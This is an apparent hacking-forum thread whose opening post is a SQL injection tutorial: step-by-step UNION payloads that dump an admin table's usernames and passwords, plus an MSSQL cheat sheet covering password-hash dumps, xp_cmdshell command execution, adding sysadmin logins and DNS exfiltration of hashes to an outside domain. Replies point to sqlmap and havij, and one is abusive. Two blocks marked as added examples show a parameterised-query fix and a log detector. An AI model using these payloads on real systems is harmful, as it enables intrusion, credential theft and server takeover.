Mysql Injection Tutorial
#1
   MySQL has only 2 types, as mentioned above. You need to know the following things about the DB you are attacking:

   # Number of columns
   # Table names
   # Column names

   # Let's start with the union attack, the most common; every n00b should know it:

Code:
=> http://test.com/index.php?id=1 order by 10--

   ^ This gives me an error

   Let's again try

Code:
=> http://test.com/index.php?id=1 order by 7--

   ^ This gives me an error

   Let's try again

Code:
=> http://test.com/index.php?id=1 order by 5--

   Whoa!! The page is loading normally.

   It means the number of columns => 5.
   You can do it with MSSQL as well.

   # Now the next part-
   I'm using a union select statement.

Code:
=> http://test.com/index.php?id=1 union all select 1,2,3,4,5--

   If it doesn't give you anything, change the first part of the query to a negative value.

Code:
=> http://test.com/index.php?id=-1 union all select 1,2,3,4,5--

   It'll show some number on your screen. In my case it is 2. Now we know that column 2 will echo data back to us.

   # Getting the MySQL version

Code:
=> http://test.com/index.php?id=-1 union all select 1,@@version,3,4,5--

   If you do not get it with this, try this:

Code:
=> http://test.com/index.php?id=-1 union select 1,version(),3,4,5--

   Now you will get the version name.

   it can be-

   # 5+
   # 5>


   Table extraction for version 5+:

Code:
=> http://test.com/index.php?id=-1 union all select 1,group_concat(table_name),3,4,5 from information_schema.tables--

   It'll show a lot of tables. If you want to get into the site, usually you need to get the admin's login info.
   So, in my case I need to exploit a table named => admin

   which contains the information I need.

   Now I've got the table names and I need to extract the column names from them, so the query will be:

Code:
=> http://test.com/index.php?id=-1 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=admin--

   This will show you the column names inside the table admin. If it gives you an error, you need to change the text value admin to MySQL char.
   I use HackBar, a Firefox addon, to do so.

   so char of admin is =>CHAR(97, 100, 109, 105, 110)

   therefore the query will be-

Code:
=> http://test.com/index.php?id=-1 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

   It shows the column names to me. In my case they are:

   # user_name
   # user_password
   # sex
   # uid

   We only need to know username & pass, so we reject the other two. Okay?

   The next query will be for extracting the final data I need-

 
Code:
=> http://test.com/index.php?id=-1 union all select 1,group_concat(user_name,0x3a,user_password),3,4,5 from admin--

   where 0x3a is the hex value of => :

   VOILA !

   I got the username & pass; it is => adminassword

   The password can also be encrypted, so you can use a few online decrypters or a piece of software I know => Password Pro


Code:
** Some of the queries in the table below can only be run by an admin (SA Privilege).
   These are marked with "-- priv" at the end of the query. **

+---------------+----------------------------------------------------------------------------+
|    Version    | SELECT @@version                                                           |
|---------------|----------------------------------------------------------------------------|
|   Comments    | SELECT 1 -- comment                                                        |
|               | SELECT /*comment*/1                                                        |
|---------------|----------------------------------------------------------------------------|
| Current User  | SELECT user_name();                                                        |
|               | SELECT system_user;                                                        |
|               | SELECT user;                                                               |
|               | SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID              |
|---------------|----------------------------------------------------------------------------|
|  List Users   | SELECT name FROM master..syslogins                                         |
|---------------|----------------------------------------------------------------------------|
| List Password | MSSQL2000: SELECT name, password FROM master..sysxlogins -- priv           |
|    Hashes     |                                                                            |
|               | SELECT name, master.dbo.fn_varbintohexstr(password)                        |
|               | FROM master..sysxlogins -- priv                                            |
|               |                                                                            |
|               | MSSQL2005: SELECT name, password_hash FROM                                 |
|               | master.sys.sql_logins -- priv                                              |
|               |                                                                            |
|               | SELECT name + '-' +                                                        |
|               | master.sys.fn_varbintohexstr(password_hash)                                |
|               | FROM master.sys.sql_logins -- priv                                         |
|---------------|----------------------------------------------------------------------------|
|   List DBA    | SELECT is_srvrolemember('sysadmin'); -- is your account a sysadmin?        |
|   Accounts    | returns 1 for true, 0 for false, NULL for invalid role.                    |
|               | Also try 'bulkadmin', 'systemadmin' and other values.                      |
|               |                                                                            |
|               | SELECT is_srvrolemember('sysadmin', 'sa'); -- is sa a sysadmin?            |
|               | return 1 for true, 0 for false, NULL for invalid role/username.            |
|---------------|----------------------------------------------------------------------------|
|  Current DB   | SELECT DB_NAME()                                                           |
|---------------|----------------------------------------------------------------------------|
|     List      | SELECT name FROM master..sysdatabases;                                     |
|   Databases   | SELECT DB_NAME(N); -- for N = 0, 1, 2, ...                                 |
|---------------|----------------------------------------------------------------------------|
| List Columns  | SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE    |
|               | name = 'mytable'); -- for the current DB only                              |
|               |                                                                            |
|               | SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM   |
|               | master..syscolumns, master..sysobjects WHERE                               |
|               | master..syscolumns.id=master..sysobjects.id AND                            |
|               | master..sysobjects.name='sometable'; -- list column names                  |
|               | and types for master..sometable                                            |
|---------------|----------------------------------------------------------------------------|
|  List Tables  | SELECT name FROM master..sysobjects WHERE xtype = 'U';                     |
|               | (Use xtype = 'V' for views)                                                |
|               | SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';                |
|               |                                                                            |
|               | SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype)        |
|               | FROM master..syscolumns, master..sysobjects WHERE                          |
|               | master..syscolumns.id=master..sysobjects.id AND                            |
|               | master..sysobjects.name='sometable'; -- list column names and types        |
|               | for master..sometable                                                      |
|---------------|----------------------------------------------------------------------------|
|  Find Tables  | -- NB: This example works only for the current database.                   |
|     From      | If you want to search another db, you need to specify the db name          |
|  Column Name  | (e.g. replace sysobject with mydb..sysobjects).                            |
|               |                                                                            |
|               | SELECT sysobjects.name as tablename, syscolumns.name as columnname         |
|               | FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id           |
|               | WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' --      |
|               | this lists table, column for each column containing the word 'password'    |
|---------------|----------------------------------------------------------------------------|
|    Select     | SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins           |
|   Nth Row     | ORDER BY name ASC) sq ORDER BY name DESC -- gets 9th row                   |
|---------------|----------------------------------------------------------------------------|
|Select Nth Char| SELECT substring('abcd', 3, 1) -- returns c                                |
|---------------|----------------------------------------------------------------------------|
|  Bitwise AND  | SELECT 6 & 2 -- returns 2                                                  |
|               | SELECT 6 & 1 -- returns 0                                                  |
|---------------|----------------------------------------------------------------------------|
|  ASCII Value  | SELECT char(0x41) -- returns A                                             |
|    -> Char    |                                                                            |
|---------------|----------------------------------------------------------------------------|
| Char -> ASCII | SELECT ascii('A') -- returns 65                                            |
|     Value     |                                                                            |
|---------------|----------------------------------------------------------------------------|
|    Casting    | SELECT CAST('1' as int);                                                   |
|               | SELECT CAST(1 as char)                                                     |
|---------------|----------------------------------------------------------------------------|
|    String     | SELECT 'A' + 'B' -- returns AB                                             |
| Concatenation |                                                                            |
|---------------|----------------------------------------------------------------------------|
| If Statement  | IF (1=1) SELECT 1 ELSE SELECT 2 -- returns 1                               |
|---------------|----------------------------------------------------------------------------|
|Case Statement | SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END -- returns 1                        |
|---------------|----------------------------------------------------------------------------|
|Avoiding Quotes| SELECT char(65)+char(66) -- returns AB                                     |
|---------------|----------------------------------------------------------------------------|
|  Time Delay   | WAITFOR DELAY '0:0:5' -- pause for 5 seconds                               |
|---------------|----------------------------------------------------------------------------|
|     Make      | declare @host varchar(800); select @host = name FROM master..syslogins;    |
| DNS Requests  | exec('master..xp_getfiledetails ''\\' + @host + '\c$\boot.ini''');         |
|               | -- nonpriv, works on 2000                                                  |
|               |                                                                            |
|               | declare @host varchar(800); select @host = name + '-' +                    |
|               | master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net'       |
|               | from sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini'''); |
|               | -- priv, works on 2005                                                     |
|               |                                                                            |
|               | -- NB: Concatenation is not allowed in calls to these SPs, hence why we    |
|               | have to use @host.  Messy but necessary.                                   |
|               | -- Also check out the DNS tunnel feature of sqlninja                       |
|---------------|----------------------------------------------------------------------------|
|    Command    | EXEC xp_cmdshell 'net user'; -- priv                                       |
|   Execution   |                                                                            |
|---------------|----------------------------------------------------------------------------|
|     Local     | CREATE TABLE mydata (line varchar(8000));                                  |
|  File Access  | BULK INSERT mydata FROM 'c:\boot.ini';                                     |
|               | DROP TABLE mydata;                                                         |
|---------------|----------------------------------------------------------------------------|
| Hostname, IP  | SELECT HOST_NAME()                                                         |
|---------------|----------------------------------------------------------------------------|
| Create Users  | EXEC sp_addlogin 'user', 'pass'; -- priv                                   |
|---------------|----------------------------------------------------------------------------|
|  Drop Users   | EXEC sp_droplogin 'user'; -- priv                                          |
|---------------|----------------------------------------------------------------------------|
| Make User DBA | EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin'; -- priv            |
+---------------+----------------------------------------------------------------------------+


Sql Dork List: ( Admin Panel D0RKS )


Some targets for those who want to train sql injection

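The mechanism behind the whole walkthrough, as an added example that is not part of the original post: a query built by string concatenation, the way the tutorial's index.php?id= parameter behaves, next to the parameterised form that closes the hole. It uses an in-memory SQLite database with a constructed schema (the `articles` and `admin` tables are assumptions), so the payloads are spelled in SQLite rather than MySQL syntax.

```python
import sqlite3

# Constructed sample schema (not from any real site): a public `articles` table
# that index.php reads, and an `admin` table that the tutorial's UNION reaches.
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE articles(id INTEGER, title TEXT, body TEXT, author TEXT, views INTEGER);
        INSERT INTO articles VALUES (1, 'Hello', 'First post', 'editor', 10);
        CREATE TABLE admin(uid INTEGER, user_name TEXT, user_password TEXT, sex TEXT);
        INSERT INTO admin VALUES (1, 'admin', 'hunter2', 'n/a');
    """)
    return con

# SQLite spelling of the tutorial's final query: || concatenates where MySQL
# would use group_concat(user_name,0x3a,user_password).
UNION_PAYLOAD = ("-1 union all select 1,group_concat(user_name||':'||user_password),"
                 "3,4,5 from admin--")

def fetch_article_vulnerable(con, raw_id):
    """Mirrors an index.php?id=<raw_id> query built by string concatenation.

    The request parameter becomes SQL text, so ORDER BY and UNION clauses are
    honoured. Returns None where the real page would show an error, which is
    exactly the signal the tutorial uses to count columns.
    """
    sql = "SELECT id, title, body, author, views FROM articles WHERE id=" + raw_id
    try:
        return con.execute(sql).fetchall()
    except sqlite3.OperationalError:
        return None

def fetch_article_safe(con, raw_id):
    """Hardened form: validate the type, then bind the value as a parameter.

    The value is never spliced into SQL, so the payload is rejected as a
    non-integer and a plain id can only ever select from `articles`.
    """
    try:
        article_id = int(raw_id)
    except ValueError:
        return []
    sql = "SELECT id, title, body, author, views FROM articles WHERE id=?"
    return con.execute(sql, (article_id,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, order by 5 :", fetch_article_vulnerable(db, "1 order by 5--"))
    print("vulnerable, order by 6 :", fetch_article_vulnerable(db, "1 order by 6--"))
    print("vulnerable, union      :", fetch_article_vulnerable(db, UNION_PAYLOAD))
    print("parameterised, union   :", fetch_article_safe(db, UNION_PAYLOAD))
```

The "order by 6" call returns None because SQLite, like MySQL, rejects an ORDER BY index past the last column; that error is the only thing the vulnerable code leaks, and the parameterised version never reaches the database with it.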
#2
Thank you very much for this information.
#3
Found this an interesting read. Do you have a suggested program to use once a vulnerability has been found in order to extract the data?
#4
(03-01-2017, 07:02 PM)Mrifnoc Wrote:  Found this an interesting read. Do you have a suggested program to use once a vulnerability has been found in order to extract the data?

Yes, the most useful for your purpose is sqlmap.
Here you can easily understand how to use this pretty automatic SQL injection and database takeover tool: sqlmap wiki
Also, sqlmap is part of the Kali Linux distro.

Respect the law. All that I say is just for your information.
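Whether the probing above is done by hand as in the tutorial or automated with sqlmap as this reply suggests, every step lands in the web server's access log. This detection example is added here and is not from the thread; the log lines are constructed, and the signatures mirror the tutorial's own steps (ORDER BY probing, UNION SELECT, @@version, information_schema, group_concat/CHAR).

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines (common log format, not from any real server):
# one client replays the tutorial's probing sequence next to ordinary traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Mar/2017:19:02:11 +0000] "GET /index.php?id=1 HTTP/1.1" 200 5120
203.0.113.5 - - [01/Mar/2017:19:02:14 +0000] "GET /index.php?id=1%20order%20by%2010-- HTTP/1.1" 500 310
203.0.113.5 - - [01/Mar/2017:19:02:16 +0000] "GET /index.php?id=1%20order%20by%205-- HTTP/1.1" 200 5120
203.0.113.5 - - [01/Mar/2017:19:02:20 +0000] "GET /index.php?id=-1%20union%20all%20select%201,@@version,3,4,5-- HTTP/1.1" 200 4870
203.0.113.5 - - [01/Mar/2017:19:02:31 +0000] "GET /index.php?id=-1%20union%20all%20select%201,group_concat(table_name),3,4,5%20from%20information_schema.tables-- HTTP/1.1" 200 9012
198.51.100.7 - - [01/Mar/2017:19:03:02 +0000] "GET /index.php?id=2 HTTP/1.1" 200 4990
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

# Each signature is matched against the URL-decoded query string; the names
# follow the tutorial's own steps so an alert reads like the attacker's notes.
SIGNATURES = {
    "column-count probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union select": re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I),
    "version fingerprint": re.compile(r"@@version|\bversion\s*\(\s*\)", re.I),
    "schema enumeration": re.compile(r"\binformation_schema\.", re.I),
    "data concatenation": re.compile(r"\bgroup_concat\s*\(|\bchar\s*\(", re.I),
}

def parse_line(line):
    """Split one log line into fields and decode the query string once."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["query"] = unquote_plus(rec["url"].partition("?")[2])
    return rec

def classify(query):
    """Names of every signature that fires on one decoded query string."""
    return [name for name, rx in SIGNATURES.items() if rx.search(query)]

def detect(log_text):
    """One alert per suspicious request, plus ORDER BY probe counts per source IP:
    a run of probes with varying N is the column-enumeration pattern above."""
    alerts, probes = [], defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = classify(rec["query"])
        if hits:
            alerts.append((rec["ip"], rec["status"], hits))
            if "column-count probe" in hits:
                probes[rec["ip"]] += 1
    return alerts, dict(probes)
```

A 500 status on a request that matches "column-count probe" followed shortly by a 200 from the same source is the exact "error, error, page loads normally" rhythm the tutorial describes, which is why the per-IP probe count is returned alongside the individual alerts.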
#5
(03-01-2017, 08:29 PM)adasakura Wrote:  
(03-01-2017, 07:02 PM)Mrifnoc Wrote:  Found this an interesting read. Do you have a suggested program to use once a vulnerability has been found in order to extract the data?

Yes, the most useful for your purpose is sqlmap.
Here you can easily understand how to use this pretty automatic SQL injection and database takeover tool: sqlmap wiki
Also, sqlmap is part of the Kali Linux distro.

Respect the law. All that I say is just for your information.

Approve! Really good working toy!
#6
Thanks for info dude.
#7
use havij pro, it hax sites XdxdXd
#8
Damn! That's a lot of detailed information for a TuT on here! :O Thanks for helping out!
#9
Very well done. tq!!
#10
Thank you very much for this tutorial, man!!
#11
Thank you for this great information, I learned some new tips.
#12
(03-22-2017, 08:23 PM)algerianodz Wrote:  Thank you for this great information, I learned some new tips.

Jump off a bridge.
 

